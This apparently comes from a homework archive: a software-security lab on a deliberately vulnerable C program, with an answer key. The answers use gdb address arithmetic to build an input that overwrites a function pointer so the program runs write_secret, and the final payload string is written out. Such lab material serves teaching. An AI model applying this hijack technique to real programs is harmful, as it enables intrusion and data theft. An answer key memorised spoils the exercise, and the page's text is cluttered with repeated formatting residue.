question archive Complete this Question 1) There is a stack-based overflow in the program
Subject:Computer SciencePrice:2.87 Bought7
Complete this
Question 1) There is a stack-based overflow in the program. What is the name of the stack-allocated variable that contains the overflowed buffer?
Preview
Question 2
Consider the buffer you just identified: Running what line of code will overflow the buffer? (We want the line number, not the code itself.)
Question 3
There is another vulnerability, not dependent at all on the first, involving a non-stack-allocated buffer that can be indexed outside its bounds (which, broadly construed, is a kind of buffer overflow). What variable contains this buffer?
Question 4
Consider the buffer you just identified: Running what line of code overflows the buffer? (We want the number here, not the code itself.)
Question 5
What is the address of color{red}{verb|buf|}
buf (the local variable in the color{red}{verb|main|}
main function)? Enter the answer in either hexadecimal format (a 0x followed by 8 "digits" 0-9 or a-f, like color{red}{verb|0xbfff0014|}
0xbfff0014) or decimal format. Note here that we want the address of color{red}{verb|buf|}
buf, not its contents.
Question 6
What is the address of color{red}{verb|ptrs|}
ptrs (the global variable) ? As with the previous question, use hex or decimal format.
Question 7
What is the address of color{red}{verb|write_secret|}
write_secret (the function) ? Use hex or decimal.
Question 8
What is the address of color{red}{verb|p|}
p (the local variable in the color{red}{verb|main|}
main function) ? Use hex, or decimal format.
Question 9
What input do you provide to the program so that color{red}{verb|ptrs[s]|}
ptrs[s] reads (and then tries to execute) the contents of stack variable color{red}{verb|p|}
p instead of a function pointer stored in the buffer pointed to by color{red}{verb|ptrs|}
ptrs? As a hint, you can determine the answer by performing a little arithmetic on the addresses you have already gathered. If successful, you will end up executing the color{red}{verb|pat_on_back|}
pat_on_back function. Provide the smallest positive integer.
Question 10
What do you enter so that color{red}{verb|ptrs[s]|}
ptrs[s] reads (and then tries to execute) starting from the 65th byte in color{red}{verb|buf|}
buf, i.e., the location at color{red}{verb|buf[64]|}
buf[64]? Enter your answer as an (unsigned) integer.
Question 11
What do you replace color{red}{verb|xEExEExEExEE|} with in the following input to the program (which due to the overflow will be filling in the 65th-68th bytes of color{red}{verb|buf|}) so that the color{red}{verb|ptrs[s]|} operation executes the color{red}{verb|write_secret|} function, thus dumping the secret? (Hint: Be sure to take endianness into account.)
color{red}{verb|771675175x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxEExEExEExEE|}
Answer:
1. wis
2. 62
3. ptrs
4. 101
5. 0xbfff f130
6. 0x0804 a0d4
7, 0x0804 8534
8. 0xbfff f534
9.
(p-ptrs)/4 is
print /x (0xbffff534 - 0x804a0d4)/4
0x2dfed518 or 771675416
10.
(gdb) print /x &buf[64]
$6 = 0xbffff170
(gdb) print /d (int*)&buf[64]-(int *)&ptrs
$14 = 771675175
771675175
11.
(gdb) print &write_secret
$7 = (void (*)(void)) 0x8048534 <write_secret>
771675175\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x34\x85\x04\x08